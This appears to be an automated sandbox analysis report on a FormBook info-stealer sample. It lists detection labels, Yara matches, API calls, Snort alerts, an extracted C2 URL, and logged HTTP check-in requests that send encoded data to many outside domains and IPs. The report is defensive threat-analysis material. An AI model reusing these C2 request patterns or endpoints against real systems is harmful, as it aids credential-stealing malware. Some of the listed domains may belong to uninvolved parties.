Source: eQLPRPErea.exe	ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

Source: 3.2.eQLPRPErea.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.wlanext.exe.8bf110.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.eQLPRPErea.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.wlanext.exe.3597960.5.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: eQLPRPErea.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: eQLPRPErea.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	1_2_0040531D
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	1_2_00405CB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 1_2_004026BC FindFirstFileA,	1_2_004026BC

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 4x nop then pop edi	3_2_004162B0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 4x nop then pop edi	3_2_00415644
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 4x nop then pop edi	3_1_004162B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi	9_2_008662B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi	9_2_00865644

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.stone-master.info/aqu2/

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.nagoyadoori.xyz

Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1Host: www.biehnrecords.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.bedpee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.pmrack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1Host: www.serversexposed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.heliumhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1Host: www.420vaca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.shujahumayun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1Host: www.dottproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.autobrehna.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.appgusher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 91.195.240.94 91.195.240.94

Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1Host: www.biehnrecords.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.bedpee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.pmrack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1Host: www.serversexposed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.heliumhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1Host: www.420vaca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.shujahumayun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1Host: www.dottproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.autobrehna.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.appgusher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.biehnrecords.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 08:49:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>

Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp	String found in binary or memory: http://browsehappy.com/
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp	String found in binary or memory: http://produkte.web.de/homepage-und-mail/homepage-parken/
Source: explorer.exe, 00000005.00000002.955671038.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: C:\Users\user\Desktop\eQLPRPErea.exe

Code function: 1_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00404EBC

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_004181D0 NtCreateFile,	3_2_004181D0
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00418280 NtReadFile,	3_2_00418280
Source: C:\Users\user\Desktop\eQLPRPErea.exe	Code function: 3_2_00418300 NtClose,	3_2_00418300
